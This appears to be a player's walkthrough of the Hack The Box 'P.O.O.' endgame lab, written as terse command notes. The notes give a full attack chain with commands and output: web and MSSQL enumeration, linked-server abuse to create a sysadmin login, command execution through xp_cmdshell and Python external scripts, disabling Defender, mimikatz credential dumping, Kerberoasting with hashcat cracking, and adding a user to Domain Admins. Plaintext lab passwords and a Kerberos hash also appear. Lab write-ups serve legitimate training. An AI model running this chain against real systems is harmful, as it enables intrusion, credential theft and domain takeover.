P.O.O.

https://app.hackthebox.com/endgames/poo

Introducción

Professional Offensive Operations

By eks and mrb3n

Professional Offensive Operations is a rising name in the cyber security world.

Lately they've been working into migrating core services and components to a state of the art cluster which offers cutting edge software and hardware.

P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies.

The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.

Entry Point: 10.13.38.11

---

Enumeration

ping -c 1 10.13.38.11 -R

NMAP Scans

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.13.38.11 -oG allPorts

nmap -p80,1433 -sCV 10.13.38.11 -oN targeted

# Nmap 7.94SVN scan initiated Fri Mar 29 18:18:25 2024 as: nmap -p80,1433 -sCV -oN targeted 10.13.38.11
Nmap scan report for 10.13.38.11
Host is up (0.26s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2024-03-29T22:18:45+00:00; +4s from scanner time.
| ms-sql-ntlm-info: 
|   10.13.38.11:1433: 
|     Target_Name: POO
|     NetBIOS_Domain_Name: POO
|     NetBIOS_Computer_Name: COMPATIBILITY
|     DNS_Domain_Name: intranet.poo
|     DNS_Computer_Name: COMPATIBILITY.intranet.poo
|     DNS_Tree_Name: intranet.poo
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-29T19:52:54
|_Not valid after:  2054-03-29T19:52:54
| ms-sql-info: 
|   10.13.38.11:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM+
|       number: 14.00.2027.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: true
|_    TCP port: 1433
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 18:18:41 2024 -- 1 IP address (1 host up) scanned in 16.08 seconds

Bruteforce Directories

dirsearch -u 10.13.38.11

DS Enumeration Directory

GitHub - Keramas/DS_Walk: Python tool for enumerating directories and files on web servers that contain a publicly readable .ds_store file.GitHub

DS_Walk Repository

python ds_walk.py -u http://10.13.38.11

Output of ds_walk.py

[32m[!] .ds_store file is present on the webserver.0m
[32m[+] Enumerating directories based on .ds_server file:0m
----------------------------
[!] http://10.13.38.11/admin
[!] http://10.13.38.11/dev
[!] http://10.13.38.11/iisstart.htm
[!] http://10.13.38.11/Images
[!] http://10.13.38.11/JS
[!] http://10.13.38.11/META-INF
[!] http://10.13.38.11/New folder
[!] http://10.13.38.11/New folder (2)
[!] http://10.13.38.11/Plugins
[!] http://10.13.38.11/Templates
[!] http://10.13.38.11/Themes
[!] http://10.13.38.11/Uploads
[!] http://10.13.38.11/web.config
[!] http://10.13.38.11/Widgets
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11/Images/buttons
[!] http://10.13.38.11/Images/icons
[!] http://10.13.38.11/Images/iisstart.png
----------------------------
[!] http://10.13.38.11/JS/custom
----------------------------
[!] http://10.13.38.11/Themes/default
----------------------------
[!] http://10.13.38.11/Widgets/CalendarEvents
[!] http://10.13.38.11/Widgets/Framework
[!] http://10.13.38.11/Widgets/Menu
[!] http://10.13.38.11/Widgets/Notifications
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts/custom
[!] http://10.13.38.11/Widgets/Framework/Layouts/default
----------------------------
[32m[*] Finished traversing. No remaining .ds_store files present.0m
[32m[*] Cleaning up .ds_store files saved to disk.0m

IIS Shortname Scanner

GitHub - lijiejie/IIS_shortname_Scanner: an IIS shortname ScannerGitHub

python3 iis_shortname_scanner.py http://10.13.38.11/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

poo_co~1.txt
_co%%%% 

Path bruteforce with WFUZZ

grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt 
wc -l co_fuzz.txt
wfuzz -c -w co_fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404
curl 10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt

MSSQL Enumeration / Linkcrawler

msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
run

search mssql
use exploit/windows/mssql/mssql_linkcrawler
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11

Installing USQL for client to MSSQL

go install -tags most github.com/xo/usql@latest
usql 
\c mssql://external_user@10.13.38.11:1433
#p00Public3xt3rnalUs3r#

MSSQL Enumeration

SELECT name FROM sys.databases;

SELECT suser_name(); 
SELECT name,sysadmin FROM syslogins;
SELECT srvname, isremote FROM sysservers;

SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select current_user');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select name,sysadmin from syslogins');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select srvname,isremote from sysservers');

SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'EXECUTE(''SELECT * FROM OPENQUERY([COMPATIBILITY\POO_PUBLIC], ''''SELECT SUSER_NAME();'''');'')');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');');

SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",select * from openquery("COMPATIBILITY\POO_PUBLIC", ''select name from master.dbo.sysdatabases'')');

Adding Username to the DB

EXECUTE('EXECUTE(''EXEC master..sp_addlogin ''''3ky'''', ''''3ky123!'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";

EXECUTE('EXECUTE(''EXEC master..sp_addsrvrolemember ''''3ky'''',''''sysadmin'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";

Check Username

msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD 3ky123!
set USERNAME 3ky
set RHOST 10.13.38.11
run

XP_cmdshell

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'whoami';
go

Enabling external scripts

EXEC sp_configure 'external scripts enabled', 1
reconfigure
go

Using external scripts (example)

EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("whoami")'
go

Type web.config for extract administrator credentials.

EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("type C:\\inetpub\\wwwroot\\web.config")'
go

EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("netstat -ano")'
go

echo "dead:beef::1001 compatibility.htb" | sudo tee -a /etc/hosts

Evil-WinRM

evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O."

net user administrator

Set-MpPreference -DisableRealtimeMonitoring $true

Mimikatz.exe

mimikatz/mimikatz.exe at master · ParrotSec/mimikatzGitHub

.\mimikatz.exe token::elevate lsadump::cache exit

Invoke-Kerberoast.ps1

Empire/Invoke-Kerberoast.ps1 at master · EmpireProject/EmpireGitHub

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'powershell -exec bypass -c "import-module C:\temp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat haschat | f1"'
go

$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$A645B9CC69231DECE1D6EA7597FB0E47$83861CAE6474DF369FBC7DA10206403F8460129473B851720026FCD45D4FB62EDCD4A13024BF16DC09BF337F6EBA54FFF32308E523A1A9521211731C7108C712ABA91227A0051ABDEDD9CFA769A7AAAC8997163F0AF9DF29CF4E96276A044751340D8F26A3BE509A2FAC9E13B4EF851B8905180DD0C4B374A9133EC007DA9E54228613A91DCBA56879E42CAC146D0178BD936FB88C9271DB4338100E5DF1A81AF3F36D61C435984A5CF9B02FC8DB077F16C8921C22FAADF78B5B91447FD1B3DADA006663BD91FD0A5E5F3B33593F3C47AF2CE1C4A863C7DC3DCAE9F5EE8E0B980199DC7F6E9AC85E661BEADFAD7B219CBE0B60C822A61FFF2152E9E71FBE3E3E82E26C513AE664AC2C1312183D99136D70EF8FFC7DBA9CE8B49D941737BF18D511D11BCD004FA7EBB37469FCA6BFCCD6E281363DA5AEC48B0A92F34039812EDB042ADD4B9E22D89BC1402D3760D417E7C84022954B70FCE28B629BEA40A3F3EB88895A49B9039D3421E0BA17D5578927CC6E006C9859E9FF7BB1F7FAAFBC733FAAE18FB726B67D4EF1643B4B88F227A0B1794C0EA05D7996C565BA85DFDDFC0ED4E2D3FF66AB13763E91937B258FDCFCCA02FF53DF48B45086E89CEC99E898C2DD4A5E12DD53EBC9F4325A2F45A1EE895F6FDD2324AFC629243AFEFA098C714D863FE8C6A198DABF661563D106C767BAAEE3D27911EB701D49DCD702CA121E110125EE1DB0F759BF53E6E6DABBA7863638DC09A420C15638B830A869FB359DD1367FFBDA04EAD4711B2BDBA9B7B9D4AAEFB819A25CC358943A234CB262CB3B1FD69FC1D9724A01AC46B711917C6B1D9DDFA2F623FC7C0E1444522BF84C0FC5A1943DCC6D074EE151CB1B25C2A50F91A465086DAFEF44A7ABEC8463E8B3B33E922E1648458609220C2B79F2C264C5FEA08AF969F64A5C05E2D2570CCA9BB401263CCBE851FA15C554C2C021EFF2FB9A293ACF898F67296407CF2ADDEE36B8BAD716FB61C8800BAD049CE63A7AA31D8D7891D47028EC26E4900F883F6C9B7FDA430D1B1602F2D969F6BDBEEBEB5A0E40655B1DCE23CA43C2A3FCF2AB4B34D872D0BE0A58C17194FE3B1726031B7909A37D2C470CF61AAF204E1942E2E1B78D11F3921B4F03CFD68F23BB702ADF84EF2D99F75D91CBD5183E450BDE04236BAB0C66F42AD7141B1AFB7963E56B37668AE24ADA1B378C8D9993AE5723C0B0FC11A8372EB738D18988D90C736D1A4B3979CE16C344FD3B33B957756F5C5C03AD3978DC912A048A9EBCA6A244CE84AEA74D57066DA235CCA373571DCE88A0B8D21A4053C9ABC075C4208164E10D9762A9F06193BA833261F245D525A38FF590DFBA50D9FD29B6997D094D9C592D2F92AA3BEC0441126EBBFCE6105FDDD5135654820F6221C2CE12B6AFE5E4B403E488616313874FBEB4452037BA63964051DAE064F9503E9740B4C5E51F24CE795B8FF078ECC6D0E1E642A383C8AAFCBAD5A822

hashcat -a0 -m 13100 hash.txt /usr/share/wordlists/seclists/Passwords/Keyboard-Combinations.txt

ZQ!5t4r

Sharphound

GitHub - BloodHoundAD/SharpHoundGitHub

sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'cd C:\temp && SharpHound.exe -c all'
go

PowerView.ps1

PowerTools/powerview.ps1 at master · PowerShellEmpire/PowerToolsGitHub

evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." -s .

$user = 'intranet.poo\p00_adm'
$pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force -AsPlainText
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
Add-DomainGroupMember -Identity "Domain Admins" -Members "p00_adm" -Credential $cred


$pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force -AsPlainText
$cred = New-Object -TypeName System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $Cred